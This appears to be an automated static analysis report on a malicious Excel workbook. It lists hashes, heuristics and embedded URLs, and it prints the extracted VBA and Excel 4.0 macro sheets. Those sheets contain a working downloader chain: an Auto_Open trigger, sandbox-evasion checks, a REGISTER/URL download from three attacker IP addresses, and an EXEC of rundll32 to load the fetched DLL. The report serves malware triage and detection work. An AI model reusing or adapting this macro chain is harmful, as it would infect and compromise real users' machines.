Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 191e8ce41d5808fc…

MALICIOUS

Office (OOXML)

Size: 216.1 KB
Created: 2015-06-05 18:19:34 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-06-17
MD5: c5e8197c45012f05b559e3260a6b5fa7
SHA-1: a40e127ab4e4b6afa290947665b387260d352412
SHA-256: 191e8ce41d5808fcc57a4fa74bfa746e3c9227b9c2a2f8a5968765746108985f
Risk Score: 210

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

This Excel document contains critical-severity Excel 4.0 (XLM) macros that use dangerous functions such as CALL and REGISTER to download and execute a second-stage payload. An Auto_Open macro is present, so the chain starts as soon as the workbook is opened. The macros build and fetch the embedded URLs, such as http://5.34.180.57/44313,6048108796.dat, which likely serves the second-stage payload; the third macro sheet then calls EXEC on "rundll32 ..\Butyo.vikas,DllRegisterServer" to load a DLL. The first macro sheet also runs several GET.WORKSPACE environment checks and closes the workbook when they fail, a common sandbox-evasion pattern. The presence of hidden worksheets further suggests an attempt to conceal the malicious activity.

Heuristics (7)

  • Excel 4.0 macro sheet (3 sheet(s)) [critical | 1 related finding | OOXML_XLM_MACROSHEET]
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Dangerous XLM formula APIs: FORMULA, GOTO, HALT, REGISTER, EXEC [critical | OOXML_XLM_DANGEROUS_FN]
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 or rewrite the macro sheet at run time (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • VBA project inside OOXML [medium | 1 related finding | OOXML_VBA]
    Document contains a VBA project (VBA macros present).
  • Auto_Open macro [high | OLE_VBA_AUTO]
    An Auto_Open procedure is defined; Excel runs it automatically when the workbook is opened.
  • Suspicious extracted artifact [medium | EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Hidden worksheet (hidden) [low | OOXML_HIDDEN_SHEET]
    Excel workbook contains 3 hidden sheet(s). Hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction.
  • Embedded URL [info | EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://5.34.180.57/ (in document text: OOXML body / shared strings)
    • http://45.138.157.216/ (in document text: OOXML body / shared strings)
    • http://45.12.32.131/ (in document text: OOXML body / shared strings)
    • http://5.34.180.57/44313,6048108796.dat (in document text: OOXML body / shared strings)
    • http://45.138.157.216/44313,6048108796.dat (in document text: OOXML body / shared strings)
    • http://45.12.32.131/44313,6048108796.dat (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revision (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6 (in document text: OOXML body / shared strings)

Extracted artifacts (5)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2651 bytes
SHA-256: 5b8703c963ccff58b2fe5575bbc6e69f0df0597a77d0f2f9ac7619e250577a21
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Sub Auto_Open()


Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True

Application.Run Sheets("Kost").Range("AM5")
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 12288 bytes
SHA-256: 4af5a69b72686ae2f95f829c98e98f406dae10333748edcada85b24b68aeebef
xlm_sheet_00.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 4198 bytes
SHA-256: f90092cc573c0044407cb440d829560b618b9bf3234fc08e39504c578c519997
Preview (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{5E3EE2C8-4BD1-4A7A-8165-1C49BDB78CBA}"><dimension ref="AG57:AM77"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="1" width="6.28515625" style="3" customWidth="1"/><col min="2" max="2" width="14.28515625" style="3" customWidth="1"/><col min="3" max="31" width="9.140625" style="3"/><col min="32" max="32" width="9.140625" style="3" customWidth="1"/><col min="33" max="34" width="9.140625" style="3" hidden="1" customWidth="1"/><col min="35" max="35" width="17.5703125" style="3" hidden="1" customWidth="1"/><col min="36" max="38" width="9.140625" style="3" hidden="1" customWidth="1"/><col min="39" max="39" width="11.7109375" style="3" hidden="1" customWidth="1"/><col min="40" max="16384" width="9.140625" style="3"/></cols><sheetData><row r="57" spans="34:39" x14ac:dyDescent="0.25"><c r="AJ57" s="3"><v>1</v></c></row><row r="58" spans="34:39" x14ac:dyDescent="0.25"><c r="AJ58" s="3"><v>9</v></c></row><row r="60" spans="34:39" x14ac:dyDescent="0.25"><c r="AI60" s="3"><f>NOW()</f><v>44313.604810879631</v></c></row><row r="61" spans="34:39" x14ac:dyDescent="0.25"><c r="AI61" s="3" t="b"><f>FORMULA(AH73&amp;AH74&amp;AH75,AJ65)</f><v>0</v></c></row><row r="62" 
spans="34:39" x14ac:dyDescent="0.25"><c r="AH62" s="3" t="str"><f>CONCATENATE(AH68,AI60,AH66,AH67)</f><v>http://5.34.180.57/44313,6048108796.dat</v></c><c r="AM62" s="3" t="e"><f>IF(GET.WORKSPACE(42),,CLOSE(1))</f><v>#N/A</v></c></row><row r="63" spans="34:39" x14ac:dyDescent="0.25"><c r="AH63" s="3" t="str"><f>CONCATENATE(AH69,AI60,AH66,AH67)</f><v>http://45.138.157.216/44313,6048108796.dat</v></c></row><row r="64" spans="34:39" x14ac:dyDescent="0.25"><c r="AH64" s="3" t="str"><f>CONCATENATE(AH70,AI60,AH66,AH67)</f><v>http://45.12.32.131/44313,6048108796.dat</v></c><c r="AJ64" s="3" t="s"><v>3</v></c></row><row r="66" spans="34:39" x14ac:dyDescent="0.25"><c r="AH66" s="3" t="s"><v>0</v></c><c r="AJ66" s="3" t="s"><v>4</v></c></row><row r="67" spans="34:39" x14ac:dyDescent="0.25"><c r="AH67" s="3" t="s"><v>1</v></c><c r="AJ67" s="3" t="s"><v>5</v></c><c r="AM67" s="3" t="e"><f>IF(GET.WORKSPACE(19),,CLOSE(1))</f><v>#N/A</v></c></row><row r="68" spans="34:39" x14ac:dyDescent="0.25"><c r="AH68" s="3" t="s"><v>9</v></c><c r="AM68" s="3" t="e"><f>GET.WORKSPACE(26)</f><v>#N/A</v></c></row><row r="69" spans="34:39" x14ac:dyDescent="0.25"><c r="AH69" s="3" t="s"><v>10</v></c><c r="AI69" s="3" t="e"><f>GOTO(Blodas!G6)</f><v>#N/A</v></c><c r="AM69" s="3" t="b"><f>IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),ON.TIME(NOW()+"00:00:02","Milolos"),CLOSE(1))</f><v>0</v></c></row><row r="70" spans="34:39" x14ac:dyDescent="0.25"><c r="AH70" s="3" t="s"><v>11</v></c><c r="AJ70" s="3" t="s"><v>8</v></c></row><row r="72" spans="34:39" x14ac:dyDescent="0.25"><c r="AM72" s="3" t="b"><f>HALT()</f><v>0</v></c></row><row r="73" spans="34:39" x14ac:dyDescent="0.25"><c r="AH73" s="3" t="s"><v>2</v></c></row><row r="74" spans="34:39" x14ac:dyDescent="0.25"><c r="AH74" s="3" t="s"><v>7</v></c></row><row r="75" spans="34:39" x14ac:dyDescent="0.25"><c r="AH75" s="3" t="s"><v>6</v></c></row><row r="77" spans="34:39" x14ac:dyDescent="0.25"><c r="AI77" s="3" 
t="b"><f>GOTO(Jioka!H15)</f><v>0</v></c></row></sheetData><pageMargins left="0.7" 
... (truncated)
xlm_sheet_01.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet2.xml | 2097 bytes
SHA-256: 0a66b50328ea57abfd0fba95f93001e89e484283026f92736f861e28fb7eaa14
Preview (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{B06B5105-687C-43F7-A487-3A7680CBC977}"><dimension ref="G11:G18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="9.140625" style="2"/><col min="7" max="7" width="12.140625" style="2" customWidth="1"/><col min="8" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="11" spans="7:7" x14ac:dyDescent="0.25"><c r="G11" s="2" t="b"><f>REGISTER(Kost!AJ64,Kost!AJ65,Kost!AJ66,Kost!AJ67,,Kost!AJ57,9)</f><v>0</v></c></row><row r="12" spans="7:7" x14ac:dyDescent="0.25"><c r="G12" s="2" t="e"><f>Belandes(0,Kost!AH62,Kost!AJ70,0,0)</f><v>#NAME?</v></c></row><row r="13" spans="7:7" x14ac:dyDescent="0.25"><c r="G13" s="2" t="e"><f>IF(G12&lt;0, Belandes(0,Kost!AH63,Kost!AJ70,0,0))</f><v>#NAME?</v></c></row><row r="14" spans="7:7" x14ac:dyDescent="0.25"><c r="G14" s="2" t="e"><f>IF(G13&lt;0, Belandes(0,Kost!AH64,Kost!AJ70,0,0))</f><v>#NAME?</v></c></row><row r="16" spans="7:7" x14ac:dyDescent="0.25"><c r="G16" s="2"><f>IF(G14&lt;0,CLOSE(0),)</f><v>0</v></c></row><row r="18" spans="7:7" x14ac:dyDescent="0.25"><c r="G18" s="2" t="e"><f>GOTO(Kost!AI74)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" 
header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_02.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet3.xml | 1832 bytes
SHA-256: 5e80fd069ac35c5e39918d8dfaaf0ba77875f57b487bcfcc5d8bc7d346806551
Detection
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 2 shell/COM execution token(s).
Preview (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{7CC12E8C-181F-40F2-A690-14110549575E}"><dimension ref="H9:I20"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="9.140625" style="2"/><col min="8" max="8" width="9.85546875" style="2" customWidth="1"/><col min="9" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="9" spans="8:9" x14ac:dyDescent="0.25"><c r="I9" s="2" t="str"><f>"rundll32 ..\Butyo.vikas"</f><v>rundll32 ..\Butyo.vikas</v></c></row><row r="10" spans="8:9" x14ac:dyDescent="0.25"><c r="I10" s="2" t="str"><f>",DllRegisterServer"</f><v>,DllRegisterServer</v></c></row><row r="16" spans="8:9" x14ac:dyDescent="0.25"><c r="H16" s="2" t="b"><f>EXEC(I9&amp;I10)</f><v>0</v></c></row><row r="20" spans="8:8" x14ac:dyDescent="0.25"><c r="H20" s="2" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>